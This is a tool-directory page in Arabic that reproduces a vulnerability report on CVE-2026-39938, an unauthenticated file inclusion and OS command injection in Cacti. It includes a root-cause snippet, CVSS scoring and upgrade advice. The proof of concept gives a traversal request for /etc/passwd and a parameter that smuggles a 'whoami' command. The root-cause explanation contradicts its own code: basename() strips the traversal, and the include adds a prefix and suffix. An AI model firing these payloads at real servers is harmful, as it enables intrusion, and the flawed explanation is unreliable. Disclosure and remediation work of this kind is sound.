Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-39938 — تقرير مفصل عن ثغرة CVE-2026-39938 في Cacti ≤1.2.30، يوضح LFI دون مصادقة متسلسل إلى حقن أوامر نظام التشغيل RCE مع PoC وتحليل السبب الجذري وإرشادات المعالجة. | Kitploit
أدوات/GitHubGitHub/kx00007/cve-2026-39938
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubkx00007/cve-2026-39938

CVE-2026-39938

تقرير مفصل عن ثغرة CVE-2026-39938 في Cacti ≤1.2.30، يوضح LFI دون مصادقة متسلسل إلى حقن أوامر نظام التشغيل RCE مع PoC وتحليل السبب الجذري وإرشادات المعالجة.

عرض المستودع
3منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تقرير ثغرة: Cacti تنفيذ تعليمات برمجية عن بعد غير مصادق عليه على صورة الرسم البياني

الباحث: K | المنتج: Cacti ≤ 1.2.30 | CVE: CVE-2026-39938


[01] ملخص الثغرة

الحقلالقيمة
المنتجCacti — حل الرسم البياني الكامل المعتمد على RRDtool
الإصدار(ات) المتأثرة≤ 1.2.30
فئة الثغرةCWE-22: اجتياز المسار (LFI) → CWE-78: حقن أوامر نظام التشغيل
متجه الهجومالشبكة
المصادقةغير مطلوبة (تجاوز حساب الضيف)
تفاعل المستخدملا شيء
درجة CVSSv3.19.8 — حرجة
المتجهCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Cacti ≤ 1.2.30 معرض لـ تضمين ملفات محلية غير مصادق عليه (LFI) عبر المعامل graph_theme في graph_image.php، متسلسل إلى تنفيذ تعليمات برمجية عن بعد (RCE) من خلال حقن أوامر نظام التشغيل عبر cacti_escapeshellarg() على Windows.


[02] تدفق الثغرة

root@kitploit:~
HTTP Request
    │
    ▼
graph_image.php
    │
    ├── $guest_account = true  →  Auth bypass (no login needed)
    │
    ├── graph_theme param  →  LFI (CWE-22)
    │       └── Path traversal via basename() bypass
    │
    └── Other params (graph_height, etc.)
            └── cacti_escapeshellarg()  →  OS injection (CWE-78)
                    └── proc_open()  →  RCE

[03] السبب الجذري: LFI عبر graph_theme

المعامل graph_theme غير معقم بشكل كافٍ. حاول الإصلاح استخدام basename() ولكن يمكن تجاوز ذلك بسهولة — مسار مثل themes/../../etc/passwd يجتاز التحقق من basename() مع الاستمرار في اجتياز الدلائل.

مسار الكود الثغرة في graph_image.php:

root@kitploit:~
$theme = basename($_GET['graph_theme']); // basename() is NOT sufficient
include_once("./include/theme_" . $theme . ".php"); // LFI

يستبدل الإصلاح في الإصدار 1.2.31 دالة basename() بـ cacti_validate_theme()، والتي تستخدم قائمة السماح بنظام الملفات.


[04] المتطلبات الأساسية

الشرطالاحتماليةملاحظات
Cacti يعمل على Windowsشائع في المؤسساتخلل في هروب cmd.exe يمكّن RCE
حساب الضيف مفعلشائع — غالبًا افتراضيمستخدم الضيف يسمح بعرض الرسوم البيانية علنًا
وجود رسم بياني واحد على الأقلتقريبا عالميlocal_graph_id=1 موجود بعد التثبيت
RRDtool مثبتمطلوب من قبل Cactiدائمًا موجود

[05] إثبات المفهوم

LFI — قراءة ملفات عشوائية

root@kitploit:~
GET /cacti/graph_image.php?local_graph_id=1&graph_theme=../../../../etc/passwd

سلسلة LFI → RCE

root@kitploit:~
GET /cacti/graph_image.php?local_graph_id=1&graph_height=100" & whoami & "&action=view

حقن أوامر نظام التشغيل يوفر بالفعل تنفيذ تعليمات برمجية عن بعد مباشر (RCE)، لذا فإن LFI ليس ضروريًا لتحقيق الاختراق.

ومع ذلك، من منظور الباحث، إذا تم النظر إلى كلتا المشكلتين معًا:

  • يمكن استخدام LFI لقراءة config.php والحصول على بيانات اعتماد قاعدة البيانات أو بيانات التكوين الحساسة.
  • يمكن استخدام حقن أوامر نظام التشغيل لتنفيذ أوامر النظام والسيطرة على الخادم.
  • يمكن أن يساعد LFI أيضًا في تأكيد التغييرات على النظام (على سبيل المثال، التحقق من نجاح إنشاء ملف أو حمولة).

يظهر هذا أن الجمع بين ثغرات متعددة يزيد من التأثير العام ويجعل الاستغلال أسهل وأكثر موثوقية.


[06] تقييم التأثير

الركيزةالتقييمالوصف
السريةعاليةوصول قراءة كامل لنظام ملفات خادم الويب (التكوين، بيانات اعتماد قاعدة البيانات)
النزاهةعاليةتنفيذ أوامر عشوائية، نشر شيل ويب
التوفرعاليةإنهاء العمليات، إتلاف الملفات، رفض الخدمة

[07] تسجيل CVSS v3.1

المقياسالقيمة
متجه الهجومالشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةلا شيء
تفاعل المستخدملا شيء
النطاقلم يتغير
السريةعالية
النزاهةعالية
التوفرعالية

الدرجة: 9.8 — حرجة


[08] المعالجة

الأولويةالإجراء
فوريالترقية إلى Cacti 1.2.31 أو أحدث

👤 المؤلف

MENG HOKSENG
باحث أمني مستقل


المراجع:

  • GHSA-rm7p-qcqm-x5m6
  • https://www.cve.org/CVERecord?id=CVE-2026-39938
  • https://github.com/Cacti/cacti/pull/6966
تنزيل الأداة